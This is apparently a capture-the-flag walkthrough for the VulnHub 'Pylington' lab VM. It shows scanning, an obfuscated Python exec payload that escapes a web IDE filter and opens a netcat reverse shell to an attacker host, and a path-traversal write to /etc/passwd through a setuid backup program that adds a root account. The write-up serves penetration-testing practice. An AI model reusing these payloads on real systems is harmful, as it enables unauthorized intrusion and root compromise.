https://www.vulnhub.com/entry/pylington-1,684/
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)
Scan port 80.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/register (Status: 301) [Size: 239] [--> http://192.168.56.100/register/]
/index.html (Status: 200) [Size: 4065]
/assets (Status: 301) [Size: 237] [--> http://192.168.56.100/assets/]
/404.html (Status: 200) [Size: 3305]
/robots.txt (Status: 200) [Size: 83]
Check robots.txt
~ cat robots.txt
User-agent: *
Disallow: /register
Disallow: /login
Disallow: /zbir7mn240soxhicso2z
Visit /zbir7mn240soxhicso2z, get username and password.
Username: steve
Password: bvbkukHAeVxtjjVH
Login, get an python IDE, with some string bypass. Use exec function to get reverse shell.
strimp='imp'+'ort'+' o'+'s;'
strcmd='o'+'s.system("nc 192.168.56.150 1234 -e /bin/bash")'
exec(strimp)
exec(strcmd)
Get reverse shell.
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:51044.
id
uid=33(http) gid=33(http) groups=33(http)
In home folder of user py, get typing.cc.
[http@archlinux py]$ ls -la
ls -la
total 56
dr-xr-xr-x 3 py py 4096 Apr 16 23:41 .
drwxr-xr-x 3 root root 4096 Apr 7 18:43 ..
-rw------- 1 py py 21 Dec 20 18:44 .bash_logout
-rw------- 1 py py 57 Dec 20 18:44 .bash_profile
-rw------- 1 py py 141 Dec 20 18:44 .bashrc
-r-------- 1 py py 11 Apr 9 12:04 password.txt
drwx------ 2 py py 4096 Apr 9 19:31 secret_stuff
-r-sr-xr-x 1 py py 19216 Apr 9 12:15 typing
-r--r--r-- 1 py py 689 Apr 9 12:15 typing.cc
-r-------- 1 py py 34 Apr 9 12:32 user.txt
Check source code of typing.cc. Get password of py.
[http@archlinux py]$ ./typing
./typing
Let's play a game! If you can type the sentence below, then I'll tell you my password.
the quick brown fox jumps over the lazy dog
the quick brown fox jumps over the lazy dog
the quick brown fox jumps over the lazy dog
54ezhCGaJV
Ssh login as user py, in /home/py/secret_stuff folder, found backup.cc.
[py@archlinux ~]$ cd secret_stuff/
[py@archlinux secret_stuff]$ ls -la
total 40
drwx------ 2 py py 4096 Apr 9 19:31 .
dr-xr-xr-x 3 py py 4096 Apr 16 23:41 ..
-rwsr-xr-x 1 root root 26128 Apr 9 19:30 backup
-rw-r--r-- 1 root root 586 Apr 9 19:30 backup.cc
[py@archlinux secret_stuff]$
Check source code of backup.cc.
[py@archlinux secret_stuff]$ cat backup.cc
#include <iostream>
#include <string>
#include <fstream>
int main(){
std::cout<<"Enter a line of text to back up: ";
std::string line;
std::getline(std::cin,line);
std::string path;
std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
std::getline(std::cin,path);
if(!path.starts_with("/srv/backups/")){
std::cout<<"The file must be inside the /srv/backups directory!\n";
}
else{
std::ofstream backup_file(path,std::ios_base::app);
backup_file<<line<<'\n';
}
return 0;
}That means we can write new user with root privilege into /etc/passwd.
[py@archlinux secret_stuff]$ ./backup
Enter a line of text to back up: root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd
[py@archlinux secret_stuff]$ su root2
Password:
[root@archlinux secret_stuff]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux archlinux 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux
